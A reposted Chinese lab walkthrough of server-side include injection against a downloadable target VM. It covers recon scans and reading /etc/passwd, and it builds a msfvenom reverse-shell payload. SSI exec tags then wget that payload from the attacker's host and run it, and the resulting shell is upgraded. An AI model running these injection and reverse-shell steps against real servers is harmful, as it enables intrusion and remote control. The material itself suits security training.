生活随笔
收集整理的這篇文章主要介紹了
SSI漏洞注入
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
SSI漏洞注入原理
SSI(Server Side Include),通常稱為服務器端嵌入,是一種類似于ASP的基于服務器的網頁制作技術。SSI具有強大的功能,只要使用一條簡單的SSI命令就可以實現整個網站的內容更新,時間和日期的動態顯示,以及執行shell和CGI腳本程序等復雜的功能。
在很多場景中,用戶輸入的內容可以顯示在頁面中,比如一個存在反射XSS漏洞的頁面,如果輸入的payload不是xss代碼而是ssi的標簽,服務器又開啟了ssi支持的話就會存在SSI漏洞。
準備工作
靶機地址:
鏈接:https://pan.baidu.com/s/1MTunDny-m5eICXAS9P8ugA
提取碼:x3c2
漏洞復現過程
使用netdiscover發現存活主機
netdiscover -i eth0
使用nmap進行服務探測
nmap -sV 172.20.10.8
再使用nikto和dirb對目標服務器進行子目錄的信息挖掘
nikto -host http://172.20.10.8
dirb http://172.20.10.8
-
發現了index.shtml文件,可初步判斷存在ssi注入
-
使用dirb探測時發現了ssi的具體目錄,對各個目錄進行登錄訪問
-
在robots.txt文件中沒有發現任何有價值的信息
-
在index目錄和index.php頁面上發現了一個登錄網站和一些命令信息
-
訪問index頁面
嘗試使用上述命令登錄網站后端獲取敏感信息
- 在繞過字符過濾時,發現能得到/etc/passwd文件的信息
嘗試用msfvenom生成shellcode對網站進行漏洞注入
msfvenom -p python/meterpreter/reverse_tcp lhost=本機IP lport=4444 -f raw > /root/Desktop/shellcode.py
- 注意:因為注入時要用到文件上傳,因此要開啟apache服務才能注入成功,并將shellcode.py文件上傳到html文件目錄上
service apache2 start
service apache2 status
mv /root/Desktop/shellcode.py /var/www/html
打開msfconsole框架,進行漏洞利用并監聽
msfconsole
use exploit/multi/handler
set lhost 本機IP
set payload python/meterpreter/reverse_tcp
run
在http://靶機ip/index.php中利用post表單進行shellcode的下載
- 在第一個輸入框中輸入任意值
- 第二個輸入框中執行惡意命令
<!--#EEXEC cmd="wget http://本機IP/shellcode.py">
<!--#EEXEC cmd="chmod 777 shellcode.py">
<!--#EEXEC cmd="python shellcode.py">
- 反彈webshell成功
- 輸入以下代碼進行終端優化
shell
python -c "import pty; pty.spawn('/bin/bash')"
id;pwd
總結
以上是生活随笔為你收集整理的SSI漏洞注入的全部內容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。